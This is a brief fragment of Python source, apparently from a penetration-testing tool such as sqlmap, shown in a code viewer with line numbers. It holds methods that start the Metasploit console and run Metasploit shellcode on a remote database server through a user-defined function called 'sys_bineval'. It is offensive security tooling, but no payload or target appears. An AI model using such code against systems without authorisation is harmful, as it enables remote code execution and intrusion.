(self)
| 433 | self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False) |
| 434 | |
| 435 | def _runMsfShellcodeRemote(self): |
| 436 | infoMsg = "running Metasploit Framework shellcode " |
| 437 | infoMsg += "remotely via UDF 'sys_bineval', please wait.." |
| 438 | logger.info(infoMsg) |
| 439 | |
| 440 | self.udfExecCmd("'%s'" % self.shellcodeString, silent=True, udfName="sys_bineval") |
| 441 | |
| 442 | def _runMsfShellcodeRemoteViaSexec(self): |
| 443 | infoMsg = "running Metasploit Framework shellcode remotely " |
nothing calls this directly
no test coverage detected